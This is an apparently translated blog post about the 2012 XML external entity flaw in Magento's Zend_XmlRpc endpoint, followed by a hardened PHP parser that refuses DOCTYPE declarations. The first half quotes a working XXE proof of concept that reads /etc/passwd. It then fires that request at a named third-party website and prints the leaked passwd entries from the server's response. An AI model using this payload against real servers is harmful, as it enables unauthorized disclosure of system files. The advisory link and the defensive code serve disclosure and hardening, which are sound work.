0x2
The advisory also explains the exploitation method quite clearly:
Proof of concept:
-----------------
Magento uses a vulnerable Zend_XmlRpc_Server() class (Zend\XmlRpc\Server.php)
to handle XML-RPC requests. Hence it is possible to disclose arbitrary local
files from the remote system. The following HTTP POST request to the
vulnerable XmlRpc server application illustrates the exploitation of this
vulnerability:
POST /index.php/api/xmlrpc HTTP/1.1
Host: $host
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
0x3
Here 威风网 (Weifeng) is used as the example:
POST /index.php/api/xmlrpc HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1)AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1155.2 Safari/537.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Content-Length: 190
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY >
<!ENTITY qingshen SYSTEM "file:///etc/passwd" >]>
<methodCall>
<methodName>&qingshen;</methodName>
</methodCall>
HTTP/1.1 200 OK
Date: Fri, 13 Jul 2012 15:57:44 GMT
Server: nginx/1.2.0
Content-Type: text/xml; charset=UTF-8
X-Powered-By: PHP/5.2.14
Cache-Control: no-cache,must-revalidate
X-Via: 1.1 stsz14:8106 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 3228
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value><string>Method "root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
..... (many more user entries follow; omitted)
Below are results from other sites:
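The response above shows the root cause from the defender's side: the XML-RPC request body is handed to libxml with entity resolution still possible, so a DOCTYPE with a SYSTEM entity pulls /etc/passwd into the method name, and the "method not found" fault string then echoes the file back to the caller. The following PHP is an added example, not code from Zend Framework, Magento or the SEC Consult advisory; it shows a hardened loader for a methodCall body that rejects any DOCTYPE before parsing, never enables entity substitution, and constrains the method name so a fault string can never carry file contents. The function name, the sample bodies and the method-name pattern are assumptions made for this example.

```php
<?php
// Added example (not Zend Framework or Magento code): hardened parsing of an
// XML-RPC methodCall body. Assumptions: function name and inputs are
// constructed here; the method-name pattern mirrors dotted API names such as
// "catalog_product.info" and is not taken from any project's code.

function loadXmlRpcMethodCall(string $body): string
{
    // Gate 1: XML-RPC never needs a DTD, so any DOCTYPE is refused outright.
    // "<!DOCTYPE" allows no whitespace inside the keyword, so this match is exact.
    if (preg_match('/<!DOCTYPE/i', $body)) {
        throw new InvalidArgumentException('DOCTYPE declarations are not accepted');
    }

    // libxml_disable_entity_loader() is deprecated since PHP 8.0 (the loader is
    // already off by default there), so it is only toggled on older runtimes.
    $previousLoader = null;
    if (PHP_VERSION_ID < 80000) {
        $previousLoader = libxml_disable_entity_loader(true);
    }
    $previousErrors = libxml_use_internal_errors(true);

    try {
        $dom = new DOMDocument();
        // Gate 2: no LIBXML_NOENT and no LIBXML_DTDLOAD, so entities are never
        // substituted; LIBXML_NONET additionally blocks network fetches.
        $dom->substituteEntities = false;
        $dom->resolveExternals   = false;
        if (!$dom->loadXML($body, LIBXML_NONET)) {
            $err = libxml_get_last_error();
            throw new InvalidArgumentException(
                'Malformed XML: ' . ($err ? trim($err->message) : 'unknown error')
            );
        }

        // Gate 3: parser-level confirmation that no document type node exists,
        // independent of the textual check above.
        foreach ($dom->childNodes as $child) {
            if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
                throw new InvalidArgumentException('DOCTYPE declarations are not accepted');
            }
        }

        $names = $dom->getElementsByTagName('methodName');
        if ($names->length !== 1) {
            throw new InvalidArgumentException('methodCall must contain exactly one methodName');
        }
        $method = trim($names->item(0)->textContent);

        // Gate 4: only identifier-like names are accepted, so even a resolved
        // entity could never be reflected into a "method not found" fault.
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_.]*$/', $method)) {
            throw new InvalidArgumentException('Invalid method name');
        }
        return $method;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($previousErrors);
        if ($previousLoader !== null) {
            libxml_disable_entity_loader($previousLoader);
        }
    }
}

// Constructed sample inputs: the advisory-style body and a benign call.
$hostile = "<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n<!ELEMENT methodName ANY >\n"
         . "<!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>\n"
         . "<methodCall><methodName>&xxe;</methodName></methodCall>";
$benign  = "<?xml version=\"1.0\"?>"
         . "<methodCall><methodName>catalog_product.info</methodName></methodCall>";

foreach (['hostile' => $hostile, 'benign' => $benign] as $label => $body) {
    try {
        printf("%s: accepted method %s\n", $label, loadXmlRpcMethodCall($body));
    } catch (InvalidArgumentException $e) {
        printf("%s: rejected (%s)\n", $label, $e->getMessage());
    }
}
```

Running it rejects the hostile body at the first gate and accepts the benign one. The layering matters: the textual DOCTYPE check is cheap and catches the payload shown in this post, the libxml settings stop entity resolution even if a later code path parses the same body again, and the method-name constraint removes the reflection channel (the fault string) that turns an entity expansion into a file disclosure in the response above.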
0x4
https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
www.xuhantao.com, Taotao Computer Knowledge Network